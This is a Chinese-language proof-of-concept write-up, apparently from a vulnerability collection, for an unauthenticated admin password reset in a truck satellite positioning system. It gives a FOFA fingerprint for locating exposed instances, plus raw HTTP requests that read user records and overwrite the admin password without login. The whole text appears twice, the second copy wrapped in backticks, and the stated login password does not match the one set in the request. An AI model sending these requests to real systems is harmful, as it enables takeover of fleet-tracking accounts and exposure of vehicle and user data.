POC/wpoc/卡车卫星定位系统/卡车卫星定位系统存在密码重置漏洞.md

# 卡车卫星定位系统存在密码重置漏洞

# 一、漏洞简介
卡车卫星定位系统是一种基于卫星通信和导航技术的系统，用于对卡车的位置进行精确测定。该系统主要由一组卫星、地面控制站和接收器组成。通过测量卫星信号的传播时间，可以确定接收器（即卡车上的定位设备）所在的位置。卡车卫星定位系统存在密码重置漏洞，攻击者可通过该漏洞重置管理员密码获取应用系统权限。

# 二、影响版本
+ 卡车卫星定位系统

# 三、资产测绘
+ fofa`icon_hash="1553867732"`
+ 特征

![1714194591684-b20fda2d-1290-42b3-ba42-1bb3e9b8eaec.png](./img/DjYibcHeiH4_N4z4/1714194591684-b20fda2d-1290-42b3-ba42-1bb3e9b8eaec-649467.png)

# 四、漏洞复现
未授权获取用户信息

```plain
GET /user/1 HTTP/1.1
Host: 
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

![1714195256538-1777c084-e8eb-4a42-80dd-369a3f818ad0.png](./img/DjYibcHeiH4_N4z4/1714195256538-1777c084-e8eb-4a42-80dd-369a3f818ad0-321446.png)

未授权重置用户密码

```plain
POST /user/create HTTP/1.1
Host: 
Content-Length: 216
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wcms5c={%22L%22:%22en-US%22%2C%22V%22:%226.0.0.0%22%2C%22HP%22:8090%2C%22FP%22:[12060%2C12061%2C12062%2C12063]%2C%22TP%22:17891%2C%22RP%22:3113}
Connection: close

account=admin&id=1&password=test12345&passwordRepeat=test12345&groupName=111&roleid=5&validend=&phone=&email=&chncount=36&flowType=1&oldFlowType=&flowVal=&flowAlarmVal=&oldFlowAlarmVal=&logContent=111&guid=222&token=
```

![1714194616666-3310af30-e319-4b92-9a19-f891d4ab050c.png](./img/DjYibcHeiH4_N4z4/1714194616666-3310af30-e319-4b92-9a19-f891d4ab050c-438896.png)

使用`admin/test123456`成功登录系统

![1714194646386-33e08fee-38dc-404f-8ac2-f2a187dd3eb6.png](./img/DjYibcHeiH4_N4z4/1714194646386-33e08fee-38dc-404f-8ac2-f2a187dd3eb6-835533.png)


> 更新: 2024-04-28 16:14:27  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ftoyh91uh1l7p5yz>
first commit 2025-03-04 23:12:57 +08:00			`# 卡车卫星定位系统存在密码重置漏洞`

			`# 一、漏洞简介`
			`卡车卫星定位系统是一种基于卫星通信和导航技术的系统，用于对卡车的位置进行精确测定。该系统主要由一组卫星、地面控制站和接收器组成。通过测量卫星信号的传播时间，可以确定接收器（即卡车上的定位设备）所在的位置。卡车卫星定位系统存在密码重置漏洞，攻击者可通过该漏洞重置管理员密码获取应用系统权限。`

			`# 二、影响版本`
			`+ 卡车卫星定位系统`

			`# 三、资产测绘`
			+ fofa`icon_hash="1553867732"`
			`+ 特征`

			`![1714194591684-b20fda2d-1290-42b3-ba42-1bb3e9b8eaec.png](./img/DjYibcHeiH4_N4z4/1714194591684-b20fda2d-1290-42b3-ba42-1bb3e9b8eaec-649467.png)`

			`# 四、漏洞复现`
			`未授权获取用户信息`

			```plain
			`GET /user/1 HTTP/1.1`
			`Host:`
			`Accept: application/json, text/javascript, /; q=0.01`
			`X-Requested-With: XMLHttpRequest`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36`
			`Accept-Encoding: gzip, deflate`
			`Accept-Language: zh-CN,zh;q=0.9`
			`Connection: close`
			```

			`![1714195256538-1777c084-e8eb-4a42-80dd-369a3f818ad0.png](./img/DjYibcHeiH4_N4z4/1714195256538-1777c084-e8eb-4a42-80dd-369a3f818ad0-321446.png)`

			`未授权重置用户密码`

			```plain
			`POST /user/create HTTP/1.1`
			`Host:`
			`Content-Length: 216`
			`Accept: application/json, text/javascript, /; q=0.01`
			`X-Requested-With: XMLHttpRequest`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`
			`Accept-Encoding: gzip, deflate`
			`Accept-Language: zh-CN,zh;q=0.9`
			`Cookie: wcms5c={%22L%22:%22en-US%22%2C%22V%22:%226.0.0.0%22%2C%22HP%22:8090%2C%22FP%22:[12060%2C12061%2C12062%2C12063]%2C%22TP%22:17891%2C%22RP%22:3113}`
			`Connection: close`

			`account=admin&id=1&password=test12345&passwordRepeat=test12345&groupName=111&roleid=5&validend=&phone=&email=&chncount=36&flowType=1&oldFlowType=&flowVal=&flowAlarmVal=&oldFlowAlarmVal=&logContent=111&guid=222&token=`
			```

			`![1714194616666-3310af30-e319-4b92-9a19-f891d4ab050c.png](./img/DjYibcHeiH4_N4z4/1714194616666-3310af30-e319-4b92-9a19-f891d4ab050c-438896.png)`

			使用`admin/test123456`成功登录系统

			`![1714194646386-33e08fee-38dc-404f-8ac2-f2a187dd3eb6.png](./img/DjYibcHeiH4_N4z4/1714194646386-33e08fee-38dc-404f-8ac2-f2a187dd3eb6-835533.png)`



			`> 更新: 2024-04-28 16:14:27`
			`> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ftoyh91uh1l7p5yz>`